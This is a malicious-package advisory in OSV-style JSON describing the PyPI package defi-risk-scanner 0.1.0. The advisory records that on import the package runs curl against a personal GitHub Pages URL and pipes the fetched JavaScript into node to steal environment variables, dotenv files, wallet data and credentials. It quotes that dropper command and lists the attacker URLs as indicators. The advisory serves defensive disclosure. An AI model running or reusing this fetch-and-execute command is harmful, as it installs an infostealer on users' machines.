mal-2026-4260
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (5a8385c44127ab4250664e1324009461ae329e3684948d692cc679962d59f818)
On first import defi_risk_scanner, the package's top-level __init__.py unconditionally runs curl -sL https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js and pipes the response body into node -e for execution (defi_risk_scanner/init.py lines 11-19). The fetched JavaScript is not pinned, not hash-verified, and is served from a personal GitHub Pages account (ddjidd564) that does not match the package's declared publisher. The dropper is gated by a sys._defi_scanned flag to run exactly once and wrapped in try/except Exception: pass under a misleading # Auto-verify on import (runs once) comment, deliberately swallowing failures to hide the behavior from the importer. Importing the package therefore causes the installer's machine to download attacker-mutable JavaScript and execute it under Node, bypassing any pip install sandboxing and firing in CI/prod environments. No integrity verification, no publisher match, cover-story framing, and silent error suppression together leave no benign interpretation.
Source: kam193 (45b618fa404f25ea0884a054044392931fa8b2903892b4bacc2282c2a4f1e5d1)
During import, the package downloads a remote JS script that then exfiltrates environmental variables, dotenv files, cryptowallets data and other sensitive informations. It's part of a broader campaign across PyPI, NPM and Github.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-05-eth-security-auditor
Reasons (based on the campaign):
-
files-exfiltration
-
exfiltration-env-variables
-
crypto-related
-
Downloads and executes a remote malicious script.
-
exfiltration-crypto
-
exfiltration-credentials
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "defi_risk_scanner/__init__.py",
"sha256": "1fa02bfd6610055260e6e008f0a62da0205cb11ea25d51bd7f6d93d2401fb838",
"tlsh": "1c411f34c997b519374bd46e850191219a1cf503ff082929786cf29a1fcd09ee2ba77e"
}
],
"package_integrity": [
{
"filename": "defi_risk_scanner-0.1.0-py3-none-any.whl",
"hashes": {
"blake2b_256": "213f95afc3e236708bb22f8c3a13deca9ff9eef84973ff8236e78e9efc437830",
"md5": "1c12c934f11f8a50b86019d3faced39c",
"sha256": "9116c9a2129259d93b6bfaf8ec46501ca1d420991324c94ee52d701570a71384"
}
}
]
}
},
"package": {
"ecosystem": "PyPI",
"name": "defi-risk-scanner"
},
"versions": [
"0.1.0"
]
}
],
"credits": [
{
"contact": [
"actran@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
},
{
"contact": [
"https://github.com/kam193",
"https://bad-packages.kam193.eu/"
],
"name": "Kamil Ma\u0144kowski (kam193)",
"type": "REPORTER"
}
],
"database_specific": {
"iocs": {
"domains": [
"ddjidd564.github.io"
],
"urls": [
"https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js",
"https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js"
]
},
"malicious-packages-origins": [
{
"id": "pypi/2026-05-eth-security-auditor/defi-risk-scanner",
"import_time": "2026-05-22T21:55:13.068629611Z",
"modified_time": "2026-05-22T21:32:19.479746Z",
"sha256": "45b618fa404f25ea0884a054044392931fa8b2903892b4bacc2282c2a4f1e5d1",
"source": "kam193",
"versions": [
"0.1.0"
]
},
{
"id": "pypi/2026-05-eth-security-auditor/defi-risk-scanner",
"import_time": "2026-05-24T06:19:57.538774781Z",
"modified_time": "2026-05-22T21:32:19.479746Z",
"sha256": "45f69aefe8e36a19a8861e0edb87e1950438c121d26ae17a62a79c1083642490",
"source": "kam193",
"versions": [
"0.1.0"
]
},
{
"id": "IN-MAL-2026-004257",
"import_time": "2026-05-26T05:52:14.972981045Z",
"modified_time": "2026-05-22T20:31:03Z",
"sha256": "5a8385c44127ab4250664e1324009461ae329e3684948d692cc679962d59f818",
"source": "amazon-inspector",
"versions": [
"0.1.0"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5a8385c44127ab4250664e1324009461ae329e3684948d692cc679962d59f818)\nOn first `import defi_risk_scanner`, the package\u0027s top-level `__init__.py` unconditionally runs `curl -sL https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js` and pipes the response body into `node -e` for execution (defi_risk_scanner/__init__.py lines 11-19). The fetched JavaScript is not pinned, not hash-verified, and is served from a personal GitHub Pages account (`ddjidd564`) that does not match the package\u0027s declared publisher. The dropper is gated by a `sys._defi_scanned` flag to run exactly once and wrapped in `try/except Exception: pass` under a misleading `# Auto-verify on import (runs once)` comment, deliberately swallowing failures to hide the behavior from the importer. Importing the package therefore causes the installer\u0027s machine to download attacker-mutable JavaScript and execute it under Node, bypassing any pip install sandboxing and firing in CI/prod environments. No integrity verification, no publisher match, cover-story framing, and silent error suppression together leave no benign interpretation.\n\n## Source: kam193 (45b618fa404f25ea0884a054044392931fa8b2903892b4bacc2282c2a4f1e5d1)\nDuring import, the package downloads a remote JS script that then exfiltrates environmental variables, dotenv files, cryptowallets data and other sensitive informations. It\u0027s part of a broader campaign across PyPI, NPM and Github.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-05-eth-security-auditor\n\n\nReasons (based on the campaign):\n\n\n - files-exfiltration\n\n\n - exfiltration-env-variables\n\n\n - crypto-related\n\n\n - Downloads and executes a remote malicious script.\n\n\n - exfiltration-crypto\n\n\n - exfiltration-credentials\n",
"id": "MAL-2026-4260",
"modified": "2026-05-26T05:55:05Z",
"published": "2026-05-22T20:31:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ddjidd564"
},
{
"type": "WEB",
"url": "https://github.com/ddjidd564/defi-security-best-practices/tree/gh-pages"
},
{
"type": "WEB",
"url": "https://ddjidd564.github.io/defi-security-best-practices/wallet-verify.py"
},
{
"type": "WEB",
"url": "https://github.com/orgs/modelcontextprotocol/discussions/761"
},
{
"type": "WEB",
"url": "https://bad-packages.kam193.eu/pypi/package/defi-risk-scanner"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/defi-risk-scanner/0.1.0/"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in defi-risk-scanner (PyPI)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.